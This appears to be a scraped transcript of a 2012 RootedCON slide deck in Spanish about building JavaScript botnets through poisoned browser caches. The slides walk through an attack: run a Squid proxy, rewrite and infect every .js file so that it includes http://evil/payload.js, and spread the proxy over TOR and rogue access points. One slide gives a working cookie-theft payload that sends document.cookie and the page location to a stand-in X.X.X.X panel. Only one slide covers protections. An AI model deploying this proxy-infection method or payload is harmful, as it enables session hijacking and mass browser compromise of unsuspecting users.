chema alonso y manu "the sur" - owning “bad” guys {and mafia} with javascript botnets...
DESCRIPTION
En esta sesión se verá el funcionamiento de las javascript botnets, se analizarán entornos de despliegue y explotación, y acciones que pueden llevarse a cabo. Además, la sesión mostrará resultados de un estudio realizado a través de servidores proxy, nodos TOR y Rogue APs, que han permitido desplegar un sistema de prueba.TRANSCRIPT
![Page 1: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/1.jpg)
Owning "bad" guys {and mafia} with Javascript botnets
Chema Alonso & Manu “The Sur”
![Page 2: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/2.jpg)
![Page 3: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/3.jpg)
![Page 4: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/4.jpg)
¡Qué se infecten
ellos!
![Page 5: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/5.jpg)
![Page 6: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/6.jpg)
Man in the Middle• Interceptación de comunicaciones entre
clientes y servidores• Canal comprometido … p0wned seguro• Red:– ARP Spoofing– Rogue DHCP(6)– ICMPv6 Sppofing, SLAAC
• DNS Spoofing
![Page 7: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/7.jpg)
Man in the Browser
• Plugins para interceptar navegación– BHO– Addons
• Acceso a todo el navegador– Passwords– Código
• Troyanos Bancarios– “Tengo un ruso en mi IE”
![Page 8: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/8.jpg)
JavaScript in the Middle• Envenenamiento de la caché del navegador• No es permanente:
– Si se borra la caché, se elimina la infección• Todo archivo cacheado se usa si no ha expirado• Permiten introducir código javascript remoto• Acceso a:
– Cookies• Salvo HTTPOnly (more or less)
– Código HTML– Campos introducidos en formularios– URL– Ejecución de código remoto– …
![Page 9: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/9.jpg)
Google Analytics js y malware
![Page 10: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/10.jpg)
¿Cómo meterlo?
• XSS Permanentes• Owneando HTTP Servers• Ataques Man In the middle de red• Ataques a memcache• Imaginación….
![Page 11: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/11.jpg)
- Framework para infectar la caché de navegadores- Inyecta un javascript en cliente- Ese javascript va incluyendo los mismos payloads- http://beefproject.com - Muy conocido
![Page 12: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/12.jpg)
¿Cómo hacer una Botnet usando Javascript?
![Page 13: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/13.jpg)
¿TOR?
![Page 14: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/14.jpg)
Fácil, Fácil….
![Page 15: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/15.jpg)
Cómprate un Server barato, barato
![Page 16: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/16.jpg)
Monta un Proxy con SQUIDGET / HTTP/1.1Host: www.web.com
GET / HTTP/1.1Host: www.web.com
ResponseHome.html
ResponseHome.html
GET /a.jsp HTTP/1.1Host: www.web.com
GET /a.jsp HTTP/1.1Host: www.web.com
Responsea.jsp
Responsea.Jsp + pasarela.jsinclude http://evil/payload.js
GET /payload.js HTTP/1.1Host: evil
![Page 17: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/17.jpg)
Configura squid y haz que no expiren
Squid.conf: Activar URL rewrite program
.htaccess: Que no expiren los objetos de Apache
![Page 18: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/18.jpg)
Infecta todos los .js
![Page 19: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/19.jpg)
Inyecta tu javascript en el cliente
![Page 20: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/20.jpg)
Distribuye tu Proxy
![Page 21: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/21.jpg)
Deja que Internet haga el resto
![Page 22: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/22.jpg)
Prepara Payloads: 1 robar cookiesdocument.write(“
<img id='domaingrabber' src='http://X.X.X.X/panel/
domaingrabber.php?id=0.0.0.0&domain="+document.domain+"&location="+document.location+"&cookie="+document.cookie+"'
style='display:none;'/>");
![Page 23: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/23.jpg)
Prepara Payloads 2: robar forms
![Page 24: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/24.jpg)
Disfruta
![Page 25: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/25.jpg)
¿Quién usa esto?
![Page 26: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/26.jpg)
Mafias: El Nigeriano
![Page 27: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/27.jpg)
Mafias: El Nigeriano
![Page 28: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/28.jpg)
Mafias: El Nigeriano
![Page 29: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/29.jpg)
Mafias: El Nigeriano
![Page 30: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/30.jpg)
Mafias: El Nigeriano
![Page 31: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/31.jpg)
Mafias: Depredadores
![Page 32: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/32.jpg)
Mafias: Depredadores
![Page 33: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/33.jpg)
Mafias: Depredadores
![Page 34: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/34.jpg)
Mafias: Depredadores
![Page 35: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/35.jpg)
Mafias: Depredadores
![Page 36: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/36.jpg)
Mafias: Depredadores
![Page 37: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/37.jpg)
Mafias: Depredadores
![Page 38: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/38.jpg)
Estafador: El pobre perro
![Page 39: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/39.jpg)
Estafador: El pobre perro
![Page 40: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/40.jpg)
Psicopatas
![Page 41: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/41.jpg)
Preocupados por el anonimato
![Page 42: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/42.jpg)
Preocupados por el anonimato
![Page 43: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/43.jpg)
El del business de leer
![Page 44: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/44.jpg)
El hacker…
![Page 45: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/45.jpg)
… que estaba hackeando…
![Page 46: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/46.jpg)
… que estaba hackeado
![Page 47: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/47.jpg)
Intranet
![Page 48: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/48.jpg)
Y por supuesto Pr0n
![Page 49: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/49.jpg)
Pr0n
![Page 50: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/50.jpg)
Prepara Payloads: infecta webs
![Page 51: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/51.jpg)
Ataque dirigido a sitios
• Selección objetivo – Banco– Red Social– Intranet
• Analiza los js que carga• Payload:– Inclusión de payloads en cualquier página que
navegue.
![Page 52: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/52.jpg)
Demo
![Page 53: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/53.jpg)
Protecciones
• Cuidado con los mitm– Proxy– Redes TOR
• Política de descontaminación
• Navega sin caché• VPNs no son protección
![Page 54: Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]](https://reader036.vdocuments.net/reader036/viewer/2022062313/55912ddc1a28ab11028b4660/html5/thumbnails/54.jpg)